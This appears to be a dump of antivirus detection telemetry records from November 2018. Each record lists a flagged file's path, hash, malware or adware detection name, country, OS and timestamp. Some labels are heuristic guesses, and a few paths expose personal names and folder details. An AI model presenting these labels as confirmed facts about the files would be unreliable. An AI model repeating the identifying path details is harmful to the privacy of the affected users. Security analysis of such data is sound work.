  Row(detection=Row(filename='webbooster@iminent.com.xpi', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\1qjy1mdt.default\\extensions\\webbooster@iminent.com.xpi', filesize=612000, name='Adware/Iminent.qua.#M1.#R1'), hash='080658eab8e145bf98fe4ca8ce442937c4cbefed0973abb2d60146390f2588e7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:01:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005240-0c2ea72f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234858-E1580469\\AVSCAN-20181102-005240-0C2EA72F', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\26C4ACFCD7541AE62FB29525BD05B49EE443AF0E849669E32FE42F55F2E4F4C1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:54:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.969\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.969\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:18:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:39:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='00017856.jpg', filepath='O:\\Neuer Ordner_1_1_1_1_1\\PhotoRecovery\\jpg\\00017856.jpg', filesize=1856000, name='DR/FakePic.Gen.#M1.#R1'), hash='62987125e14fac787631c436a2314c69797a83ae30f5fad3284ad5d3c285cafd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Wondershare\\Photo Recovery\\WSPhotoRecovery.exe', parentsize=975264, timestamp='2018-11-01T12:17:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213938-920e9e01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3bb0366c\\AVSCAN-20181101-213427-6896695C\\AVSCAN-20181101-213938-920E9E01', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='3a8c404e9ea058ece70504b323607bee925882e9990616708ec54b6cdec2ce3f', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:39:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090829-1a845c0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224821-B9828F66\\AVSCAN-20181102-090829-1A845C0D', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4b254dbf70014b4b7e621bab184dac73d8322967d845df37d1f6ca32111eeb35', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\4B254DBF70014B4B7E621BAB184DAC73D8322967D845DF37D1F6CA32111EEB35', filesize=128000, name='DR/Delphi.Gen2.#M300.#R100050'), hash='4b254dbf70014b4b7e621bab184dac73d8322967d845df37d1f6ca32111eeb35', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:51:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:04:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160654-3e000950', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160645-3CD94395\\AVSCAN-20181101-160654-3E000950', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xcoresys.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\WinSys\\xcoresys.exe', filesize=512000, name='TR/Kryptik.xzcry.#M1.#R1'), hash='0d50249fa32ba88699979e3dd5cc4d34226f9206f8315c5a8ad4261a648834b0', metadata=Row(cmdline='\\\\\\/scan', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Spybot - Search & Destroy 2\\SDScan.exe', parentsize=7651984, timestamp='2018-11-01T16:12:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:19:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.299\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.299\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:20:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='d:\\kit\\autocad_2009_english_win_64bit\\crack\\setup_1\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211005-6b24847f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211005-6B24847F', filesize=3904000, name='TR/Dldr.Agent.qmgbi.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:10:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161353-e26b7445', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161353-E26B7445', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='b91a3cfe962e755cd293d2527015eea1da0b49acb1b8a3828377fc7ae92ab308', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lic framing.exe', filepath='G:\\\xa0\\LIC Framing\\LIC Framing.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:44:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reactivated.exe', filepath='C:\\Windows\\reactivated.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='98c238fe7b3be5683a397e4653deb134836d0c820319a9629357208cf80eb10b', metadata=Row(cmdline='\\\\\\/manual \\\\\\/fixskipuac \\\\\\/SkipUac', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8214288, timestamp='2018-11-01T01:02:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='musik_archiv2011.exe', filepath='\\\\?\\L:\\Downlods-Firefox\\Musik_Archiv2011.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ae6bfdedf82546836991517a266556d8c42f9a7a43fc0e6a3bb617be9f612bfd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:21:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flxcbodn.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\FLXcBoDn.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='attestati oss 577639.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\attestati oss 577639.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150950-fd70427a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150950-FD70427A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233026-fb82bf52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-232719-E449CBE6\\AVSCAN-20181101-233026-FB82BF52', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:29:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151425-32200376', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151425-32200376', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1\\qzpfkq3qat4\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540935543.5bd8cf77df06c', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Emtak\\311682672.exe', parentsize=670720, timestamp='2018-11-01T10:17:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsn4746.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T10:38:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1\\3dechevqmfn\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540935543.5bd8cf77df06c', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Emtak\\311682672.exe', parentsize=670720, timestamp='2018-11-01T11:55:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105101-b18d6ff7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2c55942\\AVSCAN-20181101-105041-AF94BD9A\\AVSCAN-20181101-105101-B18D6FF7', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='operatore cnc.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\MECCANICA\\OPERATORE CNC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\gh5y0oywzof\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541077899.5bdafb8bd8373', country='NA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Free\\724011321.exe', parentsize=671232, timestamp='2018-11-01T13:12:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e92fbb932f95d2b3eae41381e23419d2c04d11076fc5bb1ada4e79a36b2dd08d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E92FBB932F95D2B3EAE41381E23419D2C04D11076FC5BB1ADA4E79A36B2DD08D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e92fbb932f95d2b3eae41381e23419d2c04d11076fc5bb1ada4e79a36b2dd08d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:47:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101420-7f0d2e7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_671bac18\\AVSCAN-20181101-101352-7A72D4EA\\AVSCAN-20181101-101420-7F0D2E7D', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150014-8f0b6f50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150014-8F0B6F50', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\f3a1auwacbd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:18:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iddbas32.dll', filepath='e:\\samsung yedek\\c dossyaa\\program files (x86)\\common files\\borland shared\\bde\\IDDBAS32.DLL', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='85e1045c9d889a86ce767aabb37cb492a8d471c0bdf4b20ec97930dd5e5b7000', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:22:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172625-eda864c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172625-EDA864C5', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:26:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:08:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:40:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autoit3.exe', filepath='D:\\اسلاميات\\Skypee\\AutoIt3.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='6a85ffd5b6373b3ba246e408872b7007d0904cf2023a6e5cbeb9b324ea0f2198', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:21:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:13:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ddodiag.exe', filepath='\\\\?\\C:\\Windows\\System32\\ddodiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='834e78a0960d30cc07fb104a553b4976c3ab08c269942e903bb8f3f36ff4c840', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:38:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='liveupd.exe', filepath='C:\\PROGRAM FILES\\MOBINIL USB MODEM\\UPDATEDOG\\LiveUpd.exe', filesize=1628000, name='W32/Sality.AT.#M1.#R1'), hash='3a4482cabe45ec7fd730f784a1380853a8325cba93a22325bb5d3dabd6aaf64b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00018f38', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00018f38', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:08:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-002244-ae426c77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-002244-AE426C77', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:52:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ikuwy.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ikuwy.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='893cc7654068ec925e1a7d0e19b41a6c28af21c496081bfcd35113bd566566b9', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:41:17Z'), dt=datetime.date(2018, 11, 4)),
